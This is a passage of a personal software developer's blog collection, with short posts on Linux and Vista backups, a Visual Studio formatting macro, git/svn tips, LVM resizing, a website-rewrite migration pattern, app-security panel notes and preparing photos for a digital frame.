For my linux backups I've settled on [dar](http://dar.linux.free.fr/) (Disk ARchiver) + [dargui](http://dargui.sourceforge.net/) as it applies the keep it simple rule (certainly in comparison with a lot of other tools I tried, such as the ubuntu default "home user backup" tool, which has a simple ui but offers limited control and I'm not sure how easily I could recover files from it in a disaster). Dar is like tar (Tape ARchiver) but more designed with backup to disk in mind, which is what I was after in order to backup to [usb hdd](http://www.ebuyer.com/product/178934), and most importantly does incremental/differential backups the way I want.
So then I came to back up this Vista home directory (sorry, Users directory / profiles). I have disliked the old fashioned microsoft backup files (.bkf) from Windows XP and before ever since I tried to get files out of one from a Linux box. Turns out it's not exactly the best supported format. I didn't have much luck with [mtftar](http://freshmeat.net/projects/mtftar/). It seems Microsoft have produced a replacement ([plus ça change](http://en.wiktionary.org/wiki/plus_%C3%A7a_change,_plus_c%27est_la_m%C3%AAme_chose)) to the old windows backup that is evidently designed to be [simple](http://dictionary.reference.com/browse/simple "lacking mental acuteness or sense"), which has very strange ideas about how you might want to back up your pc. It seems keener to back up the sample image files from the office install than the user's photos. I very quickly fell out with this tool and moved on.
Some people might recommend windows home server, but I am not about to _pay_ for more shoddy Microsoft software in order to solve problems created by other shoddy Microsoft software. Vote with your wallet, as they say.
So next on the list, remote backup from a linux box. [backup pc](http://backuppc.sourceforge.net/) looked great, and has many nifty features, however having got it all set up I got permissions errors in the My Documents etc folders, which are the important ones. I tried different user permissions for the backup user, and different group memberships, though stopped short of resetting all user directory permissions so as to not break anything but couldn't get past these errors. More details on that attempt in my [backuppc and windows vista](http://timwise.blogspot.com/2009/10/backuppc-and-windows-vista.html) blog entry. There is a hint in the [Robocopy wikipedia](http://en.wikipedia.org/wiki/Robocopy) that there is some special mode needed to be able to get past these permissions issues.
> "The so-called Backup mode is an administrative privilege that allows Robocopy to override permissions settings (specifically, NTFS ACLs) for the purpose of making backups."
But I didn't get any further than that.
So finally I come to the conclusion that Vista just doesn't want you to do backups without paying microsoft more money, and that they have forgotten or never knew the [KISS](http://en.wikipedia.org/wiki/KISS_principle) mantra that makes *nix such a pleasure to work with. (Rather opting for their usual "making simple things easy and difficult things impossible".)
It was [Linux Format 127 Ubuntu 9.10 Cover Disc](http://www.linuxformat.co.uk/archives?issue=127) that came to the rescue. Popped the disc in, rebooted, connected my usb hdd (formatted with ext3 of course), ran `apt-get install dar`, opened the disk icon on the desktop representing the evil vista installation partition on the local disk (to get it mounted), opened the usb hdd disk icon (also to get it mounted), then ran `dar -c /media/usbhdd/backups/vistargh -z` from the directory /media/vista/Users/. This ran fine and I was able to read the file from a better operating system with no issues.
<file_sep>---
layout: post
title: format all documents in a visual studio solution
date: '2009-01-29T11:49:00.011Z'
author: <NAME>
tags:
- macro
- vb
- visual studio
modified_time: '2009-06-25T11:59:34.737Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8623933611307349730
blogger_orig_url: https://timwise.blogspot.com/2009/01/format-all-document-in-visual-studio.html
---
Here's a handy macro script for visual studio I knocked together today. It
runs "edit, format document" on every document of the listed file types.
You have to keep an eye on it as it's interactive and does sometimes pop up a
message and wait for an answer.
You can get the vb file at
[http://github.com/timabell/vs-formatter-macro](http://github.com/timabell/vs-formatter-macro)
More info at
[http://wiki.github.com/timabell/vs-formatter-macro](http://wiki.github.com/timabell/vs-formatter-macro)
Below is the original code. Note that this is older than the version available
on github above.
```
Imports System
Imports EnvDTE
Imports EnvDTE80
Imports EnvDTE90
Imports System.Collections.Generic
Imports System.Diagnostics
Imports System.Text
Public Module Formatting
Dim allowed As List(Of String) = New List(Of String)
Dim processed As Integer = 0
Dim ignored As Integer = 0
Dim errors As StringBuilder = New StringBuilder()
Dim skippedExtensions As List(Of String) = New List(Of String)
Public Sub FormatProject()
allowed.Add(".master")
allowed.Add(".aspx")
allowed.Add(".ascx")
allowed.Add(".asmx")
allowed.Add(".cs")
allowed.Add(".vb")
allowed.Add(".config")
allowed.Add(".css")
allowed.Add(".htm")
allowed.Add(".html")
allowed.Add(".js")
Try
recurseSolution(AddressOf processItem)
Catch ex As Exception
Debug.Print("error in main loop: " + ex.ToString())
End Try
Debug.Print("processed items: " + processed.ToString())
Debug.Print("ignored items: " + ignored.ToString())
Debug.Print("ignored extensions: " + String.Join(" ", skippedExtensions.ToArray()))
Debug.Print(errors.ToString())
End Sub
Private Sub processItem(ByVal Item As ProjectItem)
If Not Item.Name.Contains(".") Then
'Debug.Print("no file extension. ignoring.")
ignored += 1
Return
End If
Dim ext As String
ext = Item.Name.Substring(Item.Name.LastIndexOf(".")) 'get file extension
If allowed.Contains(ext) Then
formatItem(Item)
processed += 1
Else
'Debug.Print("ignoring file with extension: " + ext)
If Not skippedExtensions.Contains(ext) Then
skippedExtensions.Add(ext)
End If
ignored += 1
End If
End Sub
Private Sub formatItem(ByVal Item As ProjectItem)
Debug.Print("processing file " + Item.Name)
Try
Dim window As EnvDTE.Window
window = Item.Open()
window.Activate()
DTE.ExecuteCommand("Edit.FormatDocument", "")
window.Document.Save()
window.Close()
Catch ex As Exception
Debug.Print("error processing file." + ex.ToString())
errors.Append("error processing file " + Item.Name + " " + ex.ToString())
End Try
End Sub
Private Delegate Sub task(ByVal Item As ProjectItem)
Private Sub recurseSolution(ByVal taskRoutine As task)
For Each Proj As Project In DTE.Solution.Projects
Debug.Print("project " + Proj.Name)
For Each Item As ProjectItem In Proj.ProjectItems
recurseItems(Item, 0, taskRoutine)
Next
Next
End Sub
Private Sub recurseItems(ByVal Item As ProjectItem, ByVal depth As Integer, ByVal taskRoutine As task)
Dim indent As String = New String("-", depth)
Debug.Print(indent + " " + Item.Name)
If Not Item.ProjectItems Is Nothing Then
For Each Child As ProjectItem In Item.ProjectItems
taskRoutine(Child)
recurseItems(Child, depth + 1, taskRoutine)
Next
End If
End Sub
End Module
```
<file_sep>---
title: "waaaah!"
date: 2005-05-31
slashdot_url: https://slashdot.org/journal/108203/waaaah
---
<p>firefox 1.0.4 broke my favourite extension, the bookmark synchronizer.<nobr> </nobr>:(</p>
<file_sep>---
layout: post
title: Poll svn server for changes with git clone
date: '2012-04-05T15:45:00.006Z'
author: <NAME>
tags:
- bash
- git
- svn
modified_time: '2012-04-10T18:49:19.544Z'
thumbnail: http://3.bp.blogspot.com/-gjo7YaLzSpI/T32-eIibreI/AAAAAAAAAEg/NE4QizgAB5U/s72-c/poll-svn_catch.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5257654522615465429
blogger_orig_url: https://timwise.blogspot.com/2012/04/poll-svn-server-for-changes-with-git.html
---
Just for convenience, paste this in a git bash window:
while true; do date; echo "Polling svn server..."; git svn fetch;echo "Sleeping."; sleep 300; done

Then just refresh your favourite git log viewer.
Get the gist: [poll-svn.sh gist](https://gist.github.com/2353631)
That's all folks!
<file_sep>---
layout: post
title: error "Not a valid object name" filtering an ex-svn git repo with renames
date: '2008-09-10T14:18:00.007Z'
author: <NAME>
tags:
- dev
- git
- troubleshooting
- svn
modified_time: '2008-09-11T09:27:31.215Z'
thumbnail: http://farm4.static.flickr.com/3085/2800643267_aa1dd46299_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2621355116425651592
blogger_orig_url: https://timwise.blogspot.com/2008/09/error-not-valid-object-name-filtering.html
---
Under git version 1.5.4.3, which as of writing is the current in ubuntu 8.04
hardy heron, trying to split out a folder from a git repo where the repo was an
import from subversion (svn), and the folder was renamed in the past causes a
failure as shown below:
```
#!/bin/bash -v
rm -rf test-case
mkdir test-case
cd test-case/
svnadmin create svnrepo
export repo="`pwd`/svnrepo"
mkdir -p import/a
echo '1' >> import/a/file.txt
svn import -m 'initial import' import file://$repo/trunk/
svn co file://$repo/trunk/ checkout
echo '2' >> checkout/a/file.txt
svn ci -m "file modified" checkout
svn mv -m "moving file" file://$repo/trunk/a file://$repo/trunk/b
svn up checkout
echo '3' >> checkout/b/file.txt
svn ci -m "modified again" checkout
svn log -v checkout
mkdir -p gitcopy/a
git svn clone file://$repo/trunk/ gitcopy/a
cd gitcopy/a
git filter-branch --subdirectory-filter a # <= FAILS
cd ../../
mkdir gitcopy/b
git svn clone file://$repo/trunk/ gitcopy/b
cd gitcopy/b
git filter-branch --subdirectory-filter b
```
The marked line above fails with the following error:
[1] Rewrite bcfe73ef303832b6112a2419dc1da5f782672c14 (3/3)fatal:
Not a valid object name bcfe73ef303832b6112a2419dc1da5f782672c14:a
This has been fixed in the latest build of git: `version 1.6.0.1.294.gda06a`
and no longer fails.
The "fatal: Not a git repository" error message that filter branch produces
doesn't seem to matter.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/2800643267"><img
src="https://live.staticflickr.com/3085/2800643267_aa1dd46299.jpg" alt="Photo of a break dancer in barcelona"></a>
</div>
<file_sep>---
layout: post
title: starfighter
date: '2007-05-27T13:44:00.000Z'
author: <NAME>
tags:
- starfighter
- linux
- games
- fun
- oss
modified_time: '2007-05-27T14:03:29.172Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3601923976003048564
blogger_orig_url: https://timwise.blogspot.com/2007/05/starfighter.html
---
<http://starfighter.nongnu.org/>

Whilst looking for backup packages on ubuntu via synaptic by searching for the word "tar", I stumbled across the package "starfighter". So I installed it. Then ran it. And played it. It's rather good fun. Ctrl to fire lasers, space to fire rockets, cursors to get around. Spend your time chasing enemy ships around the screen, and collecting bonuses / money. Has a decent sound track too.
Highly recommended. I love the open source world.
```
$ apt-cache show starfighter
Package: starfighter
Priority: optional
Section: universe/games
Installed-Size: 368
Maintainer: Debian Games Team <<EMAIL>>
Architecture: i386
Version: 1.1-6
Depends: libc6 (>= 2.4-1), libgcc1 (>= 1:4.1.0), libsdl-image1.2 (>= 1.2.3), lib
sdl-mixer1.2 (>= 1.2.6), libsdl1.2debian (>> 1.2.7+1.2.8), libstdc++6 (>= 4.1.0)
, starfighter-data (= 1.1-6)
Filename: pool/universe/s/starfighter/starfighter_1.1-6_i386.deb
Size: 116320
MD5sum: 959f894e78517a3411c3c2656d61b85c
SHA1: ac7e2f458d4bd8c57056e11bb3da8609f35b528c
SHA256: 29c9adee1ee2fb52f1d790254683579e919655ad01bb806a02a59d32abcb8d58
Description: 2D scrolling shooter game
After decades of war one company, who had gained powerful supplying both
sides with weaponary, steps forwards and crushes both warring factions
in one swift movement. Using far superior weaponary and AI craft, the
company was completely unstoppable and now no one can stand in their
way. Thousands began to perish under the iron fist of the company. The
people cried out for a saviour, for someone to light this dark hour...
and someone did.
.
Features of the game:
.
o 26 missions over 4 star systems
o Primary and Secondary Weapons (including a laser cannon and a charge weapon)
o A weapon powerup system
o Wingmates
o Missions with Primary and Secondary Objectives
o A Variety of Missions (Protect, Destroy, etc)
o 13 different music tracks
o Boss battles
.
Homepage: <http://www.parallelrealities.co.uk/starfighter.php>
Bugs: mailto:<EMAIL>
Origin: Ubuntu
```
<file_sep>---
title: "laughing my behind off!"
date: 2005-05-13
slashdot_url: https://slashdot.org/journal/106757/laughing-my-behind-off
---
<p>Here's <a href="http://slashdot.org/comments.pl?sid=147501&cid=12359432">a reminder</a> to log off.</p>
<file_sep>---
title: Zero-downtime website rewrite migrations
layout: post
reddit: https://www.reddit.com/user/timabell/comments/13or19w/zerodowntime_website_rewrite_migrations/
---
As we know, big-bang rewrites are incredibly dangerous. They are likely to fail or be rejected. For example, the new thing never reaches "feature parity" and gets rejected in favour of the system you were trying to replace.
But how do you practically avoid it? If it's one website on one domain then that seems irreducible. Right?
But there is a way.
## A change looms
You need to change the technology for your website for some reason.
Perhaps your [tech debt](/2020/07/09/approaches-to-refactoring-and-technical-debt/) is out of control and you basically need to do a complete rewrite from scratch, perhaps you've decided to switch technology.
Perhaps you have decided to move everything in your company to a different tech stack.
Either way you are making a BIG change to your technology. Out with the old, in with the new.
### A C# to Rails migration at DfE
I was lucky enough to be involved in a technology shift at the Department for Education (UK) with some exceptionally talented people. I'd been part of a team creating an MVP (Minimal Viable Product) in C# with a couple of web front ends and a postgres database (yay no sql server!). The department then decided to shift wholesale to Ruby on Rails (for good reasons, but they are not important here).
The approach taken was superb, went really well, and is well worth learning from, I'll outline it here for the benefit of all. It was inspired by a [previous rewrite at gov.uk](https://insidegovuk.blog.gov.uk/2016/07/29/the-specialist-publisher-rebuild-behind-the-scenes/) as we were lucky enough to have fabulous people on the team who'd been involved in that.
## How to seamlessly migrate
What's unsurprising here is that you spin up a new web service in your new technology, or with your new way of doing things.
There are two simple key elements that allow a seamless piece-by-piece migration:
1. HTTP redirects in both directions
2. Shared state
These two allow you to build a new service, one tiny piece of functionality at a time, and immediately put them into production, retiring the legacy version of that feature immediately.
## Bi-directional HTTP redirects
It goes as follow:
1. Chose one feature to build in the new technology
2. Spin up the new service on a similar subdomain (e.g. "`www2.example.org`" next to the legacy "`www.example.org`")
3. In the new service, redirect all routes that are not yet implemented to the legacy domain
4. In the legacy service redirect the single route for the chosen feature to the new service.
Now users will seamlessly transition in and out of the new service as they click around the site.
This is genius and I wish I could say I thought of it myself!
Repeat until all desired features are on the new service and the legacy service can be turned off.
## Shared state
It's obviously important that if a user does something on the new system that it is immediately reflected in the state on the legacy system. For us this meant shared access to the postgresql database. The exact method probably isn't that important so long as you can get it to be seamless.
Whatever your state store is, it's important to "freeze" schema changes while you do the transition (within reason) so that you avoid the overhead of updating both system's understanding of the storage schema.
## No more legacy
This will go smoother if you observe the cardinal rule of rewrites: no new functionality can be added to the legacy system. Any changes and fixes must be postponed or made on the new service.
This is to avoid the trap where the old system keeps being improved and the new system can never catch up. It also prevents your time and resources being invested in something that you plan to delete.
> "While it’s tempting to add new features to Specialist Publisher right now, we need to concentrate on rewriting and integrating with the Publishing Platform. ... We don’t want to run two versions of Specialist Publisher concurrently for very long as it risks creating confusion, so we’ll deprioritise product requests until the rebuild is complete."
>
> ~ [<NAME>, Inside GOV.UK, 2016](https://insidegovuk.blog.gov.uk/2016/07/29/the-specialist-publisher-rebuild-behind-the-scenes/#:~:text=while%20it%E2%80%99s%20tempting%20to%20add%20new%20features%20to%20specialist%20publisher%20right%20now%2C%20we%20need%20to%20concentrate%20on%20rewriting%20and%20integrating%20with%20the%20publishing%20platform.%20)
The only exception to this is whatever changes are needed to support the seamless user experience across the two services. Notably the redirections.
## Monitoring
As you migrate your tech, keep an eye on your telemetry, error reporting and anything else you have to make sure your user experience remains good throughout.
## Pattern name: Strangler Fig
This approach is known as the "strangler fig" pattern.
> "An alternative route is to gradually create a new system around the edges of the old, letting it grow slowly over several years until the old system is strangled. Doing this sounds hard, but increasingly I think it's one of those things that isn't tried enough"
>
> ~ <NAME>
> <https://martinfowler.com/bliki/StranglerFigApplication.html>
See also
- <https://learn.microsoft.com/en-us/azure/architecture/microservices/design/patterns>
- <https://www.freecodecamp.org/news/what-is-the-strangler-pattern-in-software-development/>
## The end
There's not much more to say on this. It's a simple concept that packs a huge punch. If you're thinking of modernising a web stack, or changing tech, I would 100% recommend this approach. The risks of failure are so much lower.
Many thanks to those I worked with who showed the way.
<file_sep>---
title: Enabling modern app security
layout: post
---
A broad-view of improving security in any organisation.
## An inspirational panel discussion
Yesterday I went to a panel discussion hosted by [eSynergy](https://esynergy.co.uk/), ["Innovation at its safest: Excellence in Software Engineering through Integrated Security Best Practices"](https://esynergy.co.uk/event/security-excellence-in-engineering/)

The whole event was live-streamed, [watch the panel discussion recording here](https://www.youtube.com/watch?v=FH5kyUwRZ5Q)
For me who lives in developer-land, it was a useful broadening of perspectives around app security. What follows are some bits that I took away from the discussions, which I think provide a useful starting point for anyone tasked with running any modern software systems in this increasingly hostile security environment.
### Who's who at the event
The speakers at the event were as follows:
1. Intro from [<NAME> (eSynergy)](https://www.linkedin.com/in/ulrikeeder/) [00:03:47]
2. "Beyond OWASP Top 10" from [<NAME>](https://www.linkedin.com/in/rewtd/) from OWASP and [secure delivery](https://securedelivery.io/) [<EMAIL>](https://defcon.social/@rewtd) / [@rewtd](https://twitter.com/rewtd) [00:06:37]
3. Grant was then joined for the panel discussion by: [00:19:40]
- [<NAME>](https://www.linkedin.com/in/salman-iqbal-a6a5b026), Principal Consultant, DevOps and ML Security at esynergy (hosting the panel)
- [<NAME>](https://www.linkedin.com/in/yayiwu/) VP Engineer at J.P. Morgan
- [<NAME>](https://www.linkedin.com/in/ben-burdsall-6ba2bb), Chief Technology Officer at dunnhumby, non-exec at eSynergy
- [<NAME>](https://www.linkedin.com/in/tomtechharris/) Chief Technology Officer at ClearBank, BuildCircle, ex-JustEat
## Takeaways
There's a bewildering array of things you can / should / must do for the security of your systems, users and company.
Within this article you'll find some starting points for your onwards security journey
### Levels
There are two reasons for thinking of security in layers or levels:
1. Your business needs, risks, regulatory environment and finances
2. Your security maturity
Some businesses are more at risk such as banks and thus need (and can afford) a more significant investment in security measures (such as multi-layered cloud infrastructure defenses), whereas some have less budget and less risk and so can operate at the simpler levels of security.
If you are currently very poor on security then there's little point sprinkling some advanced things on top, it's important to properly address each layer of security capability on the way up.
Regardless of your business needs, perfect security is always an unattainable ideal, but a worthy target nonetheless. The Unicorn project calls this kind of never-quite-attainable perfection an "Ideal". [The Unicorn Project and the Five Ideals: Interview with Gene Kim](https://www.infoq.com/articles/unicorn-project/)
### Whose job is security anyway?
- The directors are "accountable".
- The developers, product etc. are "responsible".
While developers can and should write "secure code" (SQL Injection vulnerabilities are still on the top 10 list), it's important that everyone plays their part.
Notably the product function ("product owners"), as they are the decision makers for balancing the competing demands placed on delivery/development teams, including how much to invest in security defenses. (Much nodding in the audience at this one!)
#### Developers
Tools help but the developers need to understand what is required.
At ClearBank there is:
- "Lunch and learn" sessions from AppSec team.
- Training with "[HackSplaining](https://www.hacksplaining.com/)".
### How ClearBank leveled-up app dev security
1. Added security training
2. Required pull-request approval from someone with security training
3. This created a temporary bottleneck, which encouraged everyone to do the security training
4. Incubated an AppSec team to "reduce the cognitive load of security" in collaboration with CISO and CTO (Tom)
1. Enthusiastic internal devs
2. Additional external resource
5. Collaboration at the top then filters down to all the teams
### Justifying security investment
The board of directors now face **criminal** penalties (i.e. jail time) if they don't properly approach security. It used to be just financial penalties but that wasn't enough as they could just be absorbed as a "cost of doing business".
If you need the C-suite or board to take security sufficiently seriously you can remind them of the legal penalties and costs!
- Do security right because it's the right thing to do and you care about your customer and their data.
- There's the "daily mail test" - how would we feel if there was a breach and it hit the papers?
- Put a cost on breaches, e.g. probability of breach multiplied by cost of breach.
- Use the "house fire" analogy. No-one thinks that insuring your house against fire is a bad investment. The same is true for investing in security before you have an incident or breach.
### Lead from the top
Leaders should do the training too, no-one is too important and it sets the tone and culture, encouraging everyone down to the devs to do the training too.
### Shift left
> Shift Left: "take a task that's traditionally done at a later stage of the process and perform that task at earlier stages"
> ~ <https://devopedia.org/shift-left>
Move security left. Nuff said. Dev+Security not Dev versus Security.
Check security and licenses at build time. Gives assurance of security for customers.
### The Top 10 is not enough
The [OWASP Top 10](https://owasp.org/Top10/) is a good tool for awareness and generating conversations, but addressing these is only the lowest "level" of security.
A much broader view of security is provided by the [OWASP Application Security Verification Standard](https://owasp.org/www-project-application-security-verification-standard/) (ASVS). It is also broken down into levels to allow you to start at the bottom and work up as your security capabilities mature, and decide what level your business needs to attain based on the relevant risks and regulations. Banks for example would go all the way to level 3.
There are also per-environment lists. E.g. [OWASP Mobile Application Security](https://mas.owasp.org/) for mobile app development.
### Pen tests
Don't just tick off "pen test", ask your pen test providers how they work.
- Do they just cover the OWASP Top 10?
- Do they just cover the SAMM Top 20?
- Do they go deeper than the Top-n?
- Do they look at ASVS?
- What tools do they use?
- Do the tools report against the ASVS? (If not talk to the tool provider!)
### Threat modelling
Use threat modelling, assess and then defend against that.
### Red/blue teams
Can be effective, but also very expensive. Do the basics first (e.g. sql-injection training!)
### Tools & resources to level-up security
- Training and assessments from [Secure Delivery](https://securedelivery.io/). They provide security training and assessments for everyone in the business, not just developers.
- [OWASP Software Assurance Maturity Model](https://owaspsamm.org/) (SAMM) A "measurable way for all types of organizations to analyze and improve their software security posture"
- [Slim Toolkit](https://github.com/slimtoolkit/slim) - had a massive impact in reducing vulnerabilities at dunnhumby.
- [HackSplaining](https://www.hacksplaining.com/) Security training, "Learn to Hack". In use at ClearBank.
- [Snyk](https://snyk.io/) (pronounced "sneak") - security integrated with CI pipelines
- Bug Bounties - good bang for buck, often find privilege escalation at the app level, even for as little as £3k per found vulnerability.
- [OWASP Cornucopia physical card game](https://owasp.org/www-project-cornucopia/) (also available online - [cornucopia online](https://cornucopia.dotnetlab.eu/), [cornucopia game source code](https://github.com/OWASP/cornucopia))
- [OWASP London Chapter Meetups](https://www.meetup.com/OWASP-London/)
### AI, LLMs & ChatGPT
There are new threats and risks with the new AI tools:
- Developers incorrectly using information provided by the LLMs
- ChatGPT allows attackers to accelerate, particularly social engineering. E.g. asking ChatGPT for an org chart instead of having to trawl for data manually, then using that in social engineering attacks. This might make it quicker for an attacker to use someone's manager's name to lend authority.
- Developers etc accidentally exfiltrating sensitive data such as private keys and passwords by providing it as inputs to an LLM such as ChatGPT that then integrates the data into its model in a way that allows extraction by a malicious third-party.
Currently use of ChatGPT is blocked at some big companies.
The change to the security landscape is a bit like asking "how did the creation of the internet change theft".
OWASP has used LLM technology to help make it easier for clients to decide which of the 150 tools they have are most appropriate.
<file_sep>---
layout: post
title: Blocking web adverts
date: '2007-07-02T21:23:00.000Z'
author: <NAME>
tags:
- howto
- firefox
modified_time: '2008-07-26T15:33:40.548Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-563864958843610830
blogger_orig_url: https://timwise.blogspot.com/2007/07/blocking-web-adverts.html
---
A friend asked me to write this up.
To remove all those annoying adverts from the web as you see it:
* install & use [firefox](http://www.mozilla-europe.org/en/products/firefox/)
* install [adblock plus](https://addons.mozilla.org/en-US/firefox/addon/1865) add-in
* install [filterset-g updater](https://addons.mozilla.org/en-US/firefox/addon/1136) add-in
Job done. Thanks for listening.
<file_sep>---
title: "morning"
date: 2004-02-26
slashdot_url: https://slashdot.org/journal/63297/morning
---
<p>urgh. I'm up already, going swimming today.<br>I'm going to have to start running soon, not looking forward to that at all.<br>I've heard that Ellen has sorted herself out and is about to get married. Go girl!<br>Smoking is a filthy habit and it's starting to annoy me when people smoke in my space, guess I'd better go find my slippers and look after that comb-over.<br>Right. I'm off to shower.<br>xx<br>Tim</p>
<file_sep>---
layout: post
title: LVM + ReiserFS for the win
date: '2011-10-25T06:17:00.002Z'
author: <NAME>
tags:
- howto
- ubuntu
- linux
- lvm
modified_time: '2011-10-25T06:20:59.060Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-149678347610055760
blogger_orig_url: https://timwise.blogspot.com/2011/10/lvm-reiserfs-for-win.html
---
LVM + ReiserFS for the win!
It's so easy to add more space
```
root@atom:~
# lvextend -L +100G /dev/vg2/local
Extending logical volume local to 200.00 GiB
Logical volume local successfully resized
root@atom:~
# resize_reiserfs /dev/vg2/local
resize_reiserfs 3.6.21 (2009 www.namesys.com)
resize_reiserfs: On-line resizing finished successfully.
root@atom:~
# df -h /dev/mapper/vg2-local
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg2-local
200G 18G 183G 9% /media/local
root@atom:~
```
<file_sep>---
title: "Swimming"
date: 2004-01-06
slashdot_url: https://slashdot.org/journal/57382/swimming
---
<p>Did exactly 20 lengths today in just 35 mins. then cycled all the way home to sort out this laptop.</p>
<p>Good timing on the laptop, I'd just brought it home when the system partition on my only other box just completely failed. The system then wouldn't boot at all. So I chucked in a small disk with a working 2k install as a primary master, check disk then kindly removed 70% of the files on my main system partition. Woop. Hello linux.</p>
<file_sep>---
title: "Swimming"
date: 2003-12-11
slashdot_url: https://slashdot.org/journal/54782/swimming
---
<p>16 lengths in half hour. not bad. (400m)<br>still haven't had enough sleep.</p>
<p>boo for Quake 3 keeping me up.</p>
<file_sep>---
layout: post
title: Quote of the day - scrum progress updates
date: '2012-02-14T10:30:00.001Z'
author: <NAME>
categories: [scrum, quote, agile]
modified_time: '2012-02-14T10:31:53.809Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6754555683725994021
blogger_orig_url: https://timwise.blogspot.com/2012/02/quote-scrum-progress-updates.html
---
Quote of the day
[<NAME>](http://www.scrumalliance.org/profiles/14884-mikko-wilkman) said
on 05 Jan 09 07:15:
> ... Even a one hour task might change to an eight hour task (or multiple
> tasks..) due to new information found out during that one hour that was the
> original estimate. The key point is not to focus on how many hours the team
> got done on the task, but how many hours really are remaining. The daily
> update should never be: "I worked on that for four hours, so you can take
> four hours out of the estimate", but rather a real estimate on how much work
> still needs to be done based on current knowledge.
from
[http://www.scrumalliance.org/articles/39-glossary-of-scrum-terms#1110](http://www.scrumalliance.org/articles/39-glossary-of-scrum-terms#1110)
<file_sep>---
layout: post
title: Dustbin of ideas - IT Contractor Buddy
date: 2017-05-12 12:32:07.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '4968885356'
_oembed_b18e108ecbda6b213fbf652d7abfff20: "{{unknown}}"
_oembed_0422473dff236b3c5dada18fd5a04f01: <a href="https://www.flickr.com/photos/tim_abell/32091991176/"><img
src="https://farm1.staticflickr.com/765/32091991176_0f19b14a2f.jpg" alt="New cycle
route, green park - closed at night, wtf" width="500" height="374" /></a>
_oembed_time_0422473dff236b3c5dada18fd5a04f01: '1510990525'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/05/12/dustbin-of-ideas-it-contractor-buddy/"
---
I've talked to a couple of people experienced in the recruitment industry and it appears that the [contractor buddy](http://blog.timwise.co.uk/2017/05/03/it-contractor-buddy/) business idea has some fatal flaws and is unlikely to succeed.
You might be surprised to hear that I consider this a success on my journey to startup success.
* I've had a business idea (not an easy thing to do!) which is more realistic than many of my previous ideas showing that my ability to spot such opportunities is improving. (It has a clear revenue model and it's fairly easy to see how it could be built.)
* I've not become too attached to it to hear valid criticism.
* By putting it out there and discussing it openly with anyone willing to help me out I've rapidly found the flaws in it without wasting valuable time or money. (Imagine if I spent two years building it to then have the same flaws sink it.)
* I've managed to find contacts from a broad range of backgrounds who have helped me to crystallize my idea - this is entirely thanks to spending time at the fabulous co-working and startup community space [grow@greenpark](https://growgreenpark.spaces.nexudus.com/en).
So what sank it?
* Even though the company would not be inserted into the financial transaction, they would still need to be a communication relay between employer/agent and candidate, and the received opinion is that this just won't fly.
* The number of contractors who could find this useful could be small, with the highly in-demand people not having to put in much work to get the next contract (therefore not gaining much value from the service), and the not-in-demand contractors are not a market the business would want to be primarily associated with as it could become a by-word for low-quality talent. This leaves the middle ground which may not be enough of a market to support the business. Before I'd talked to anyone I'd assumed that all contractors would want this (based on sample size of one - me).
<div class="flickr-pic">
<a data-flickr-embed="true" href="https://www.flickr.com/photos/tim_abell/32091991176/" title="New cycle route, green park - closed at night, wtf"><img src="https://live.staticflickr.com/765/32091991176_0f19b14a2f.jpg" width="500" height="374" alt="New cycle route, green park - closed at night, wtf"></a>
</div>
The investment required to prove/disprove these suppositions would be significant, as I think you'd basically have to build the functioning business to see what happens in reality. So on that basis, "I'm out!"
So what now?
Well there's my [Sql Data Viewer](http://blog.timwise.co.uk/sdv/) that I haven't given up on (check it out, let me know what you think and join the mailing list).
There's also the possibility of a [pivot](https://www.startupgrind.com/blog/is-pivot-the-new-fail/). Maybe there's room for something to help contractors without getting in the middle? Maybe it could send mail using their real email address and handle responses? Maybe there's already something like that out there and I should just use it instead of trying to invent my own! Let me know in the comments if you know of anything or already have ways to ease the pain.
Thanks for listening.
<file_sep>---
layout: post
title: Preparing photos for a digital picture frame
date: '2007-12-28T19:28:00.003Z'
author: <NAME>
tags:
- photography
- howto
- ubuntu
- hardware
- linux
- script
- oss
modified_time: '2008-10-04T23:47:09.540Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8312628495426408900
blogger_orig_url: https://timwise.blogspot.com/2007/12/preparing-photos-for-digital-picture.html
---
Challenge of the day was to fit as many photos as possible on a single flash
card to stick in a digital photo frame. Here's how it's done.
The frame from Philips goes by the memorable name of
[9FF2M4](http://www.consumer.philips.com/consumer/en/ca/consumer/cc/_productid_9FF2M4_37_CA_CONSUMER/)
, and by way of a quick review it is very nice. If I were a normal person, I
would probably have copied the original 2.5MB / 5 megapixel images to the
frame's flash card (1GB Compact Flash in this case, though it can take others),
and put up with not being able to fit *all* the photos on, and having some of them show sideways. But
being a perfectionist I instead sacrificed precious sleeping time to figure out
what to do. In the end I managed to trim the files down to around 200KB each,
and put portrait photos on a black background the right way up in order to save
neck ache from squinting at a sideways eiffel tower. This was all done by the
power of OSS and bash scripting. Here I present for your convenience the
methods I used, and highlight some of the useful things I picked up along the
way.
The first thing that taxed me was what size the photos needed to be to display
best whilst taking up minimal space. You would think the answer would be
emblazoned on the product's box, but no! Philips don't seem to be too keen on
promoting the resolution of the display, and even the shop keeper struggled to
give me a number. The owner's manual states: "Resolution: 800 x 480 pixels
(viewing area 680 x 480)" but after some time experimenting with test images
created with [the gimp](http://gimp.org/) I came to the conclusion that it was
impossible to get the frame to display an image pixel perfect as it seemed to
be re-scaling every picture regardless of original size. There appears to be no
guidance from Philips as to what a good resolution for the photos would be, so
after some experimentation I settled on 800x600 as this is slightly higher than
the frame's native resolution, and fills the screen nicely without losing too
much off the edges when displayed.
The frame does not appear to read orientation from the exif data so I looked
into rotating all the portrait images to display correctly. I am using the
frame in its landscape orientation as that is the form of most of the photos,
even though it can be placed in portrait orientation. When a portrait photo is
displayed (eg 480x600), the frame puts a fair amount of the image off the top
and bottom of the display, and by default puts it on a full white background
which is a little hard on the eyes and detracts from darker photos. I therefore
